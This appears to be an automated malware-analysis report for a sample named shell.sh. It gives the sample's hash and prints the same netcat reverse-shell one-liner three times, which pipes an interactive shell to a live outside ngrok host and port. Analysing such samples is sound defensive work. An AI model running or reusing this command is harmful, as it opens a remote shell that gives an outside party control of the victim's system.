PHP Malware Analysis

shell.sh

md5: d023a3b2bd3b7f7dae615fb4027fc05c

Jump to:

Screenshot


Attributes


Deobfuscated PHP code

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 2.tcp.eu.ngrok.io 12747 >/tmp/f

Execution traces


Generated HTML code

<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 2.tcp.eu.ngrok.io 12747 &gt;/tmp/f
</pre></body></html>

Original PHP code

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 2.tcp.eu.ngrok.io 12747 >/tmp/f